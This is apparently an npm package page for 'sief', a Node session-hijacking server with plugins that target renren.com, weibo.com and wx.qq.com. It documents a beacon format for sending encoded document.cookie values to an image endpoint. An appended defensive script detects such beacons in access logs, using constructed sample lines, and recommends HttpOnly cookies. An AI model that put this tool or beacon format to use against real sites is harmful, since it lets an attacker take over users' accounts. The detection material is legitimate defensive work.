sief
v0.1.2
Session hijacking tool in Node.
Downloads: 10
sief
A server that listens for cookie submissions in order to hijack sessions, with support for writing plugins for site-specific attacks.
sief = thief + safe
This is a project to hijack sessions, and also a project to make your site safer, depending on the way you use it.
Philosophy
- Do NOT steal cookies; only accept cookies submitted from anywhere (XSS, network eavesdropping, DNS hijacking…)
- Focus on the exploitation of session hijacking.
Features
- An image request endpoint that receives cookies obtained via XSS, network eavesdropping, DNS hijacking or other means.
- Log persistence.
- Prebuilt plugins to attack renren.com, weibo.com, wx.qq.com.
- Write your own plugins for the other attacks you want. Plugins are loaded, reloaded and unloaded automatically when they are added, changed or removed; no restart is needed.
- View cookie submissions in real time and log in to the hijacked sessions directly in the browser with the Sief Chrome Extension.
- Ignore a cookie submission if the same one was already received within a specified period of time, to protect your server.
Install
Install PhantomJS
Install sief
npm install sief -g
Usage
Server
Usage: sief [options] <plugin|dir ...>
Options:
-h, --help output usage information
-V, --version output the version number
-i, --ignore-time [seconds] specify seconds during which same requests will be ignored [300]
-p, --port [port] specify the port sief server listening to [3000]
-l, --log-level [level] set log level [INFO]
Submit cookies
GET /xxx.png?cookie=#cookies#&referer=#referer#&domain=#domain#
Parameters:
cookies
- Required. Encode the cookies first, for example encodeURIComponent(document.cookie)
referer
- If the attack is an XSS exploit, the referer is taken directly from headers.referer; otherwise, specify it in the query string.
domain
- The domain is derived from the referer and defaults to the main domain, for example qq.com. If you want to target one of its subdomains (wx.qq.com), specify it in the query string.
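The submission format above is also what a defender should look for in their own web-server logs. The following Node script is an added example and is not code from the sief project: it scans constructed Combined Log Format lines for requests to an image path whose query string carries a cookie= (or cookies=) parameter, notes whether the referer/domain overrides from the protocol above are present, and reports cookie names only, never their values. The log lines, the session-cookie name list and the image extension list are assumptions made for the example.

```javascript
// Added example (not part of the sief package): detect cookie-collection
// beacons of the form "GET /x.png?cookie=...&referer=...&domain=..." in
// web-server access logs. All log lines below are constructed samples.

const SAMPLE_LOG = [
  '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /static/logo.png HTTP/1.1" 200 1532 "https://shop.example/" "Mozilla/5.0"',
  '203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /x.png?cookie=sessionid%3Dabc123%3B%20csrftoken%3Dzzz&referer=https%3A%2F%2Fshop.example%2Fcart HTTP/1.1" 200 43 "https://shop.example/cart" "Mozilla/5.0"',
  '198.51.100.9 - - [10/Oct/2023:13:56:01 +0000] "GET /api/items?cookie=consent HTTP/1.1" 200 88 "-" "curl/8.0"',
  '198.51.100.9 - - [10/Oct/2023:13:56:02 +0000] "GET /t.gif?cookie=PHPSESSID%3Dqwerty&domain=wx.qq.com HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
];

// Combined Log Format: ip ident user [time] "METHOD target proto" status size "referer" "ua"
const LINE_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"/;
// Image-looking paths: a cookie parameter on one of these is the beacon pattern.
const IMAGE_EXT_RE = /\.(png|gif|jpe?g|webp|ico)$/i;
// Assumed list of common session-cookie names; their presence raises severity.
const SESSION_COOKIE_RE = /^(sessionid|phpsessid|jsessionid|connect\.sid|sid)$/i;

// Parse one log line into its fields, or return null if it does not match.
function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  const [, ip, time, method, target, status, referer, ua] = m;
  const qIdx = target.indexOf('?');
  const path = qIdx === -1 ? target : target.slice(0, qIdx);
  const query = qIdx === -1 ? '' : target.slice(qIdx + 1);
  return { ip, time, method, path, query: new URLSearchParams(query), status: Number(status), referer, ua };
}

// Return cookie names only, so a finding can be logged without re-exposing the values.
function cookieNames(raw) {
  return raw.split(';').map(s => s.trim().split('=')[0]).filter(Boolean);
}

// Scan log lines and return one finding per suspected cookie-exfiltration request.
function findCookieExfil(lines) {
  const findings = [];
  for (const line of lines) {
    const req = parseLine(line);
    if (!req) continue;
    const raw = req.query.get('cookie') ?? req.query.get('cookies');
    if (raw === null) continue;
    const names = cookieNames(raw);
    const imageBeacon = IMAGE_EXT_RE.test(req.path);
    const hasSession = names.some(n => SESSION_COOKIE_RE.test(n));
    // A cookie parameter on a non-image path with no session cookie is ordinary traffic.
    if (!imageBeacon && !hasSession) continue;
    findings.push({
      ip: req.ip,
      time: req.time,
      path: req.path,
      status: req.status,
      cookieNames: names,
      severity: hasSession ? 'high' : 'medium',
      // Protocol extras from the submission format: referer and domain overrides.
      extra: ['referer', 'domain'].filter(k => req.query.has(k)),
    });
  }
  return findings;
}

const REPORT = findCookieExfil(SAMPLE_LOG);
console.log(JSON.stringify(REPORT, null, 2));
```

Two of the four constructed lines are reported: the /x.png request (severity high, referer override present) and the /t.gif request (severity high, domain override present); the /api/items request carries a cookie parameter but is neither an image path nor a session cookie, so it is skipped. Because a 404 is still logged, the second finding shows that the beacon shape is visible even when the collecting endpoint does not exist on the scanned server. Setting session cookies with the HttpOnly attribute keeps them out of document.cookie, which removes the XSS source for this submission path in the first place.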